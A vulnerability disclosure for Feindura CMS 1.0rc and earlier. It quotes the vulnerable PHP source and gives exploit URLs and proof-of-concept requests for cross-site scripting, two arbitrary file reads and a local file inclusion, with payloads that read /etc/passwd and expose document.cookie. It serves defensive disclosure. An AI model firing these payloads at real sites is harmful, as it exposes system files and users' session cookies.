Feindura is a Open Source flat file based Content Management System for Web Designers, written in PHP. There is no need of a database and it.s easy to integrate in your Websites [ Taken from: http://feindura.org ]

Vulnerability description

Feindura CMS sufferes from multiple vulnerabilities.

• Discovered by: Eldar “Wireghoul” Marcussen
• Affected versions: <= 1.0rc

Cross site scripting

The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting. Looking at the source we can see the variable gets assigned direclty from user input and later used in output.

library/sites/editor.php:24   $category = $_GET['category'];
            library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">

Exploit: http://[host]/[path]/library/sites/editor.php?category=[XSS] PoC: http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Local file read

The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.

library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" fü IE 4.x &
             5.x
            library/process/download.php:23
            library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
            '].'/'.$_GET['filename']);

Exploit: http://[host]/[path]/library/process/download.php?filename=[path/to/file] PoC: http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

Local file read

The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads. The vulnerable code is as follows:

library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
            library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
            library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
            library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
            library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
            library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
            library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }

Exploit: http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file] PoC: http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

Local file inclusion

Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution. Vulnerable code:

index.php:26 include("library/backend.include.php");
            library/backend.include.php:46 if(isset($_GET['language']))
            library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
            library/backend.include.php-56 // includes the langFile which is set by the session var
            library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
            library/backend.include.php-58 

Exploit: http://[host]/[path]/?language=../../../../../../../etc/passwd%00 PoC: http://demo.feindura.org/?language=../../../../../../../etc/passwd%00

Solution

Password protect your feindura installation. These issues are fixed in the coming 1.1 version.

Disclosure time line

• 28-Oct-2010 - Public disclosure
• 18-Oct-2010 - Vendor response
• 18-Oct-2010 - Vendor notified through email